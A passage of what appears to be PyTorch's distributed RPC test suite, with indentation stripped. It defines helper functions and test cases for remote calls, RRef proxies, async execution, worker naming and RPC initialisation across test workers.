def get_value(self):
return self.a
def my_slow_method(self, my_tensor_arg):
time.sleep(5)
return torch.add(self.a, my_tensor_arg)
def _call_method_on_rref(method, rref, *args, **kwargs):
return method(rref.local_value(), *args, **kwargs)
def get_rref_list(values):
return [RRef(MyClass(a)) for a in values]
def add_rref_to_value(rref, value):
return rref.to_here() + value
def run_nested_pickle(pickle_cls_instance, tensor):
return pickle_cls_instance.t + tensor
def build_sparse_tensor(coalesce=False):
i = [[0, 1, 1], [2, 0, 2]]
v = [3, 4, 5]
tensor = torch.sparse_coo_tensor(i, v, (2, 3))
if coalesce:
tensor = tensor.coalesce()
return tensor
def build_complex_tensors():
a = torch.ones(3, 3)
b = [a, a]
c = [b, b]
d = [a, b]
e = {a: d}
return [a, b, c, d, e]
def non_cont_test(t_view, t_cont):
if t_view.is_contiguous():
raise Exception('t_view is contiguous!')
if not t_cont.is_contiguous():
raise Exception('t_cont is not contiguous!')
if not torch.equal(t_view, t_cont):
raise Exception('t_view is not equal to t_cont!')
return t_view
def my_function(a, b, c):
return a + b + c
def my_tensor_function(a, b):
return a + b
def my_container_sum(a):
result = a[0]
for tensor in a[1:]:
result += tensor
return result
def my_sleep_func(seconds=1):
time.sleep(seconds)
return torch.mul(torch.tensor(1), torch.tensor(1))
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
res = list_input[0]
for t in list_input:
res += t
for k, v in dict_input.items():
res += v
complex_tensors = tensor_class_input.tensors
return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
time.sleep(seconds)
return a + b
def identity(a):
return a
def no_result():
print("do nothing")
def raise_or_inc(value):
if value.numel() == 2:
raise ValueError("Expected error")
return value + 1
def nested_rpc(dst):
return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
def nested_rpc_sparse(dst):
return rpc.rpc_sync(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
)
def multi_layer_nested_async_rpc(dst, world_size, ttl):
# this method returns immediately without blocking the callee, but will
# generate additional requests.
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
rpc.rpc_async(
current_dst,
multi_layer_nested_async_rpc,
args=(next_dst, world_size, ttl - 1),
)
return 0
def nested_rref(dst):
return (
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
)
def nested_rref_sparse(dst):
return (
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
rpc.remote(
dst,
torch.add,
args=(build_sparse_tensor(), build_sparse_tensor())
),
)
def nested_remote(dst):
rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
return rref.to_here()
def nested_remote_sparse(dst):
rref = rpc.remote(dst, torch.add, args=(build_sparse_tensor(), build_sparse_tensor()))
return rref.to_here()
def rref_forward_chain(dst, world_size, rref, ttl):
if ttl > 0:
current_dst = worker_name(dst)
next_dst = (dst + 1) % world_size
ret_rref = rpc.remote(
current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
)
return [ret_rref]
else:
return rref.to_here()
def rpc_return_rref(dst):
return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
return 0
def heavy_rpc(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
def heavy_rpc_sparse(tensor):
for i in range(1, 100):
tensor *= i
tensor = tensor / (i + 1)
return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
for i in range(1, 100):
tensor *= i
tensor /= i + 1
return 0
@torch.jit.script
def my_script_func(tensor):
return torch.add(tensor, tensor)
expected_err = "Expected error"
def raise_func():
raise ValueError(expected_err)
@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
raise ValueError(expected_err)
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
raise ValueError(expected_err_escape)
global_rref = None
def set_global_rref(rref):
global global_rref
global_rref = rref
def clear_global_rref():
global global_rref
global_rref = None
def check_rref_confirmed(rref):
return rref.confirmed_by_owner()
def get_rref_debug_info():
return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
out = concurrent.futures.Future()
def callback(fut):
out.set_result(fut.wait() + z)
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(callback)
return out.result()
def get_events_from_profile(profile_rref):
return profile_rref.local_value().process_global_function_events
def add_use_future_set_result(to, x, y, z):
out = torch.futures.Future()
fut = rpc.rpc_async(to, torch.add, args=(x, y))
fut.then(lambda fut : out.set_result(fut.wait() + z))
return out.wait()
def add_use_future_nested_cb(to, x, y, z):
out = torch.futures.Future()
def callback(fut1):
fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
fut2.then(lambda fut2 : out.set_result(fut2.wait()))
fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
fut1.then(callback)
return out.wait()
def fail_on_fut(fut):
pass
@rpc.functions.async_execution
def async_raise_func():
raise RuntimeError("Expected error")
@rpc.functions.async_execution
def async_wrong_type():
return torch.zeros(2, 2)
@rpc.functions.async_execution
def async_add(to, x, y):
return rpc.rpc_async(to, torch.add, args=(x, y))
def slow_add(x, y, device="cpu"):
time.sleep(1)
x = x.to(device)
y = y.to(device)
return torch.add(x, y).cpu()
@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
return rpc.rpc_async(to, slow_add, args=(x, y, device))
@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut1: fut.set_result(fut1.wait() + z)
)
return fut
@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
fut = rpc.rpc_async(to, torch.add, args=(x, 0))
for _ in range(num):
fut = fut.then(lambda fut: fut.wait() + step)
return fut
@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
lambda fut: fut.wait() + z
)
@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
futs = []
for i in range(num):
if i == 0:
futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
else:
futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))
# TODO: use torch.futures.collect_all
lock = Lock()
state = {"cnt": 0, "ret": torch.zeros_like(x)}
ret_future = torch.futures.Future()
def inc_and_set(fut):
with lock:
state["cnt"] += 1
state["ret"] += fut.wait()
if state["cnt"] >= len(futs):
ret_future.set_result(state["ret"])
for fut in futs:
fut.then(inc_and_set)
return ret_future
@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
device = t.device
original_stream = torch.cuda.current_stream(device)
new_stream = torch.cuda.Stream(device)
new_stream.wait_stream(original_stream)
with torch.cuda.stream(new_stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
t.fill_(1)
fut = Future(devices=[device])
fut.set_result(t)
return fut
@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
def cb(fut):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
return fut.value() + z
return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
__slots__ = ("tensor", "lock", "event")
def __init__(self, t):
self.tensor = t
# Add one non-picklable field, to ensure it's ignored/skipped.
self.lock = Lock()
self.event = torch.cuda.Event(enable_timing=True)
def increase(self, v):
with self.lock:
self.tensor += v
def sum(self):
with self.lock:
self.event.record()
return self.tensor.sum()
class AsyncExecutionClass:
@staticmethod
@rpc.functions.async_execution
def static_async_add(to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
@classmethod
@rpc.functions.async_execution
def class_async_add(cls, to, x, y, z):
ret_fut = torch.futures.Future()
rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: ret_fut.set_result(fut.wait() + z)
)
return ret_fut
@rpc.functions.async_execution
def bound_async_add(self, to, x, y, z):
return rpc.rpc_async(to, torch.add, args=(x, y)).then(
lambda fut: fut.wait() + z
)
def return_future():
return torch.futures.Future()
class FooBackendOptions(rpc.RpcBackendOptions):
def __init__(self, init_method):
# Must call the __init__ of the superclass (and do so directly,
# without using super()) because... pybind.
rpc.RpcBackendOptions.__init__(self)
self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
class MyEmbeddingBagModel(torch.nn.Module):
def __init__(self, sparse):
super().__init__()
self.eb = torch.nn.EmbeddingBag(
10,
10,
sparse=sparse
)
def forward(self, x):
return self.eb(x)
class MyParameterServer:
def __init__(self, trainers):
self.lock = Lock()
self.trainers = trainers
self.iteration = 0
self.updates = 0
self.futures = []
self.total = None
self.gradient = None
@staticmethod
def get_gradient(rref):
return rref.local_value().gradient
@staticmethod
@rpc.functions.async_execution
def average(rref, riteration, tensor):
self = rref.local_value()
fut = torch.futures.Future()
with self.lock:
if riteration > self.iteration:
self.iteration = riteration
self.updates = 0
self.futures.clear()
self.futures.append(fut)
if self.total is None:
self.total = tensor
else:
self.total += tensor
self.updates += 1
if self.trainers == self.updates:
self.gradient = self.total / float(self.trainers)
for fut in self.futures:
result = self.total / float(self.trainers)
fut.set_result(result)
return fut
class RpcTestCommon():
def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
if mode == RPCExecMode.SYNC:
return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
elif mode == RPCExecMode.ASYNC:
return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
elif mode == RPCExecMode.REMOTE:
return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
def _self_py_udf_remote(self, worker_info, x, y, z):
rref = rpc.remote(worker_info, my_function, args=(x, y, z))
self.assertEqual(rref.to_here(), x + y + z)
def _self_remote_rref_as_rpc_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, x))
ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, x + y))
self.assertEqual(ret, x + y + z + x + y)
self.assertEqual(fut.wait(), x + y + z + x)
def _self_remote_rref_as_remote_arg(self, dst, x, y, z):
self_worker_info = rpc.get_worker_info()
rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, x))
self.assertEqual(
ret_rref.to_here(), x + y + z + x
)
def _world_size_one(self, a, b):
if self.rank == 0:
rpc.init_rpc(
name="me",
backend=self.rpc_backend,
rank=0,
world_size=1,
rpc_backend_options=self.rpc_backend_options,
)
def _rpc_sync(x, y):
expect = x * 2
result = rpc.rpc_sync(
"me",
my_tensor_function,
args=(x, y)
)
self.assertEqual(expect, result)
def _rpc_async(x, y):
expect = x * 2
result = rpc.rpc_async(
"me",
my_tensor_function,
args=(x, y)
).wait()
self.assertEqual(expect, result)
def _remote(x, y):
expect = x * 2
result = rpc.remote(
"me",
my_tensor_function,
args=(x, y)
).to_here()
self.assertEqual(expect, result)
_rpc_sync(a, b)
_rpc_async(a, b)
_remote(a, b)
rpc.shutdown()
def _multi_rpc(self, sparse):
dst_rank = (self.rank + 1) % self.world_size
for i in range(20):
n = i + self.rank + 1
if sparse:
x = build_sparse_tensor() * n
y = build_sparse_tensor() * n
else:
x = torch.ones(2, 2)
y = torch.ones(2, 2)
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(ret, x * 2)
def _wait_all_workers(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def _wait_all_workers_twice(self, f, x):
initialize_pg(self.file_init_method, self.rank, self.world_size)
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
self._run_uneven_workload(f, x)
# worker0 calls this at the end after waiting for RPC responses.
# worker1/2 calls this immediately and has some works after it.
# worker3 calls this immediately and has no more work.
rpc.api._wait_all_workers()
rpc.api._wait_all_workers()
# Wait before proceeding to shutdown to ensure worker0 RPCs make
# it through to other workers.
dist.barrier()
rpc.shutdown(graceful=False)
def _nested_rpc(self, f, expected):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
f,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, expected)
def _stress_test_rpc(self, f, repeat=1000, args=()):
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
def _builtin_remote_ret(self, x, y, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.to_here(), expected)
def _builtin_remote_self(self, x, y, expected):
rref = rpc.remote(
worker_name(self.rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.local_value(), expected)
def _test_multi_remote_call(self, fn, sparse, args_fn=lambda x, y: (), kwargs_fn=lambda x, y: {}):
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n, sparse),
kwargs=kwargs_fn(n, sparse),
)
)
expected.append(fn(*args_fn(n, sparse), **kwargs_fn(n, sparse)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
def _py_rref_args(self, a, b, x, y, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(a, b)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(x, y)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
def _py_rref_args_user_share(self, a, b, c, x, y, z, expected):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(x, y, z)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
def _py_rpc_rref_args(self, a, b, c, x, y, z, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(x, y, z)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, expected)
def _nested_remote(self, f, expected):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), expected)
def _nested_rref(self, f, expected1, expected2):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
def _nested_rref_stress(self, f, expected1, expected2):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
def _my_parameter_server(self, sparse):
ps_rref = RRef(MyParameterServer(self.world_size - 1))
futures = []
for index in range(1, self.world_size):
futures.append(
rpc.rpc_async(
worker_name((self.rank + index) % self.world_size),
self._trainer_func,
args=(
ps_rref,
sparse
),
)
)
torch.futures.wait_all(futures)
def _test_cuda_future_extraction(self, wrapper, unwrapper, sparse_tensor):
# We check proper CUDA stream synchronization by adding to the tensor
# in one stream to get the expected value, and reading it from another stream.
future = Future(devices=["cuda:0"])
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
another_stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
if sparse_tensor:
tensor = build_sparse_tensor().to("cuda:0")
add_tensor = build_sparse_tensor().to("cuda:0")
expected_tensor = (tensor + add_tensor).coalesce()
else:
tensor = torch.zeros((100,), device="cuda:0")
add_tensor = torch.ones((100,), device="cuda:0")
expected_tensor = tensor + add_tensor
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor += add_tensor
if sparse_tensor:
tensor = tensor.coalesce()
future.set_result(wrapper(tensor))
with torch.cuda.stream(another_stream):
tensor = unwrapper(future.wait())
if sparse_tensor:
self.assertTrue(torch.eq(tensor.indices(), expected_tensor.indices()).all().item())
self.assertTrue(torch.eq(tensor.values(), expected_tensor.values()).all().item())
self.assertEqual(tensor.size(), expected_tensor.size())
else:
self.assertTrue(torch.eq(tensor, expected_tensor).all().item())
class RpcTest(RpcAgentTestFixture, RpcTestCommon):
@dist_init
def test_worker_id(self):
n = self.rank + 1
peer_rank = n % self.world_size
self_worker_info = rpc.get_worker_info()
peer_worker_info = rpc.get_worker_info(worker_name(peer_rank))
self.assertEqual(self_worker_info.name, worker_name(self.rank))
self.assertEqual(peer_worker_info.name, worker_name(peer_rank))
with self.assertRaisesRegex(RuntimeError, "Unknown destination worker"):
unknown_worker_id = rpc.get_worker_info("WorkerUnknown")
@dist_init
def test_get_worker_infos(self):
worker_infos = rpc.api._get_current_rpc_agent().get_worker_infos()
worker_names = {worker_info.name for worker_info in worker_infos}
expected_worker_names = {
worker_name(rank) for rank in range(self.world_size)
}
self.assertEqual(worker_names, expected_worker_names)
worker_ids = {worker_info.id for worker_info in worker_infos}
expected_worker_ids = set(range(self.world_size))
self.assertEqual(worker_ids, expected_worker_ids)
@dist_init
def test_self_add(self):
self_worker_info = rpc.get_worker_info()
self_worker_name = worker_name(self.rank)
fut = rpc.rpc_async(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
ret = rpc.rpc_sync(self_worker_info, torch.add, args=(torch.ones(2, 2), 1))
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertEqual(ret, torch.ones(2, 2) + 1)
@dist_init
def test_send_to_rank(self):
dst_rank = (self.rank + 1) % self.world_size
# Test dense tensor
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
ret = self._run_func_in_mode(dst_rank, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
# Test invalid ranks
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(self.world_size + 1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(RuntimeError):
self._run_func_in_mode(-1, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank + 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
for exec_mode in [RPCExecMode.SYNC, RPCExecMode.ASYNC, RPCExecMode.REMOTE]:
with self.assertRaises(ValueError):
self._run_func_in_mode(dst_rank - 0.5, torch.add, exec_mode, args=(torch.ones(2, 2), 1))
@dist_init
def test_self_py_udf_remote(self):
self._self_py_udf_remote(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_rpc_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_rpc_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_rpc_arg(self):
self._self_remote_rref_as_rpc_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_remote_arg(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._self_remote_rref_as_remote_arg(
dst,
torch.ones(2, 2),
1,
3
)
@dist_init
def test_self_remote_rref_as_self_remote_arg(self):
self._self_remote_rref_as_remote_arg(
rpc.get_worker_info(),
torch.ones(2, 2),
1,
3
)
@dist_init
def test_rref_proxy_non_exist(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
msg = "has no attribute \'non_exist\'"
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_sync().non_exist()
with self.assertRaisesRegex(AttributeError, msg):
rref.rpc_async().non_exist().wait()
with self.assertRaisesRegex(AttributeError, msg):
rref.remote().non_exist()
def _test_rref_proxy_tensor(self, dst):
rref = rpc.remote(dst, my_function, args=(torch.ones(2, 2), 1, 3))
expected = torch.ones(2, 2) + 1 + 3
self.assertEqual(expected.size(), rref.rpc_sync().size())
self.assertEqual(expected + 1, rref.rpc_async().add(1).wait())
self.assertEqual(expected.view(1, 4), rref.remote().view(1, 4).to_here())
@dist_init
def test_rref_proxy_tensor(self):
self._test_rref_proxy_tensor(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_tensor_self(self):
self._test_rref_proxy_tensor(rpc.get_worker_info())
@dist_init
def test_rref_proxy_reuse(self):
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
my_function,
args=(torch.ones(2, 2), 1, 3)
)
expected = torch.ones(2, 2) + 1 + 3
proxy_rpc_sync = rref.rpc_sync()
proxy_rpc_async = rref.rpc_async()
proxy_remote = rref.remote()
self.assertEqual(expected.size(), proxy_rpc_sync.size())
self.assertEqual(expected + 1, proxy_rpc_sync.add(1))
self.assertEqual(expected.view(1, 4), proxy_rpc_sync.view(1, 4))
self.assertEqual(expected.size(), proxy_rpc_async.size().wait())
self.assertEqual(expected + 3, proxy_rpc_async.add(3).wait())
self.assertEqual(expected.view(4, 1), proxy_rpc_async.view(4, 1).wait())
self.assertEqual(expected.size(), proxy_remote.size().to_here())
self.assertEqual(expected + 5, proxy_remote.add(5).to_here())
self.assertEqual(expected.view(-1), proxy_remote.view(-1).to_here())
def _test_rref_proxy_class(self, dst):
rref = rpc.remote(dst, MyClass, args=(7,))
expected = MyClass(7)
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
expected.increment_value(3)
self.assertEqual(None, rref.rpc_sync().increment_value(1))
self.assertEqual(None, rref.rpc_async().increment_value(1).wait())
self.assertEqual(None, rref.remote().increment_value(1).to_here())
self.assertEqual(expected.get_value(), rref.rpc_sync().get_value())
self.assertEqual(expected.get_value(), rref.rpc_async().get_value().wait())
self.assertEqual(expected.get_value(), rref.remote().get_value().to_here())
self.assertEqual(
expected.my_instance_method(2),
rref.rpc_sync().my_instance_method(2)
)
self.assertEqual(
expected.my_instance_method(3),
rref.rpc_async().my_instance_method(3).wait()
)
self.assertEqual(
expected.my_instance_method(4),
rref.remote().my_instance_method(4).to_here()
)
self.assertEqual(
expected.my_static_method(9),
rref.rpc_sync().my_static_method(9)
)
self.assertEqual(
expected.my_static_method(10),
rref.rpc_async().my_static_method(10).wait()
)
self.assertEqual(
expected.my_static_method(11),
rref.remote().my_static_method(11).to_here()
)
self.assertEqual(
expected.my_class_method(2, torch.zeros(2, 2)),
rref.rpc_sync().my_class_method(2, torch.zeros(2, 2))
)
self.assertEqual(
expected.my_class_method(2, torch.ones(3, 3)),
rref.rpc_async().my_class_method(2, torch.ones(3, 3)).wait()
)
self.assertEqual(
expected.my_class_method(2, torch.ones(4, 4)),
rref.remote().my_class_method(2, torch.ones(4, 4)).to_here()
)
@dist_init
def test_rref_proxy_class(self):
self._test_rref_proxy_class(worker_name((self.rank + 1) % self.world_size))
@dist_init
def test_rref_proxy_class_self(self):
self._test_rref_proxy_class(rpc.get_worker_info())
@mock.patch.object(torch.distributed.autograd, "_init")
@mock.patch.object(torch.distributed.rpc.api, "_set_and_start_rpc_agent")
@dist_init(setup_rpc=False)
def test_register_rpc_backend_and_set_and_start_rpc_backend(
self, mock_rpc_agent, mock_dist_autograd_init
):
backend_name = "stub_backend"
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
with self.assertRaisesRegex(
RuntimeError, "^RPC backend .+: already registered$"
):
backend = rpc.backend_registry.register_backend(
backend_name,
_stub_construct_rpc_backend_options_handler,
_stub_init_rpc_backend_handler,
)
rpc.init_rpc(
name="worker1",
backend=backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
store, _, _ = next(
torch.distributed.rendezvous(
self.init_method, rank=self.rank, world_size=self.world_size
)
)
rpc._init_rpc_backend(
backend=self.rpc_backend,
store=store,
name="duplicate_name",
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_duplicate_name_2(self):
with self.assertRaisesRegex(RuntimeError, "is not unique"):
rpc.init_rpc(
name=worker_name(self.rank % (self.world_size - 1)),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
@dist_init(setup_rpc=False)
def test_reinit(self):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
# TODO: with TCP init, rank 0 raises Address already in use because
# rank 0 is the start daemon and the store is created before checking if
# RPC is already initialized in init_rpc.
if os.environ.get("RPC_INIT_WITH_TCP", None) == "1" and self.rank == 0:
expected_reinit_err = "Address already in use"
else:
expected_reinit_err = "is already initialized"
with self.assertRaisesRegex(RuntimeError, expected_reinit_err):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc.shutdown()
@dist_init(setup_rpc=False)
def test_pg_init_no_rpc_init(self):
dist.init_process_group(
backend='gloo',
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size)
class MyModel(torch.nn.Module):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(3, 4)
def forward(self, x):
return self.lin(x)
model = MyModel()
model.train()
model = torch.nn.parallel.DistributedDataParallel(model)
with self.assertRaisesRegex(RuntimeError, 'Current RPC agent is not set! Did you initialize the RPC framework'):
params = []
for param in model.parameters():
params.append(RRef(param))
def test_world_size_one(self):
self._world_size_one(
torch.ones(2, 2),
torch.ones(2, 2)
)
@dist_init(setup_rpc=False)
def test_invalid_names(self):
worker_id = 0
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo("abc*", worker_id)
with self.assertRaisesRegex(RuntimeError, "Worker name must match"):
info = WorkerInfo(" ", worker_id)
with self.assertRaisesRegex(RuntimeError, "must be non-empty"):
info = WorkerInfo("", worker_id)
# If the number in the message does not match, it is likely that the
# value of MAX_NAME_LEN in RPC WorkerInfo has changed.
with self.assertRaisesRegex(RuntimeError, "shorter than 128"):
info = WorkerInfo("".join(["a" for i in range(500)]), worker_id)
# Test that WorkerInfo can be pickled and sent in RPC call
@dist_init
def test_worker_info_pickle(self):
dst_rank = (self.rank + 1) % self.world_size
worker_info = rpc.api.get_worker_info()
ret = rpc.rpc_sync(worker_name(dst_rank), identity, args=(worker_info,))
self.assertEqual(ret, worker_info)
@dist_init
def test_add(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, torch.ones(n, n) * 2)
@staticmethod
def return_callee_id():
return rpc.get_worker_info().id
@dist_init
def test_int_callee(self):
dst_rank = (self.rank + 1) % self.world_size
ret = rpc.rpc_sync(dst_rank, RpcTest.return_callee_id)
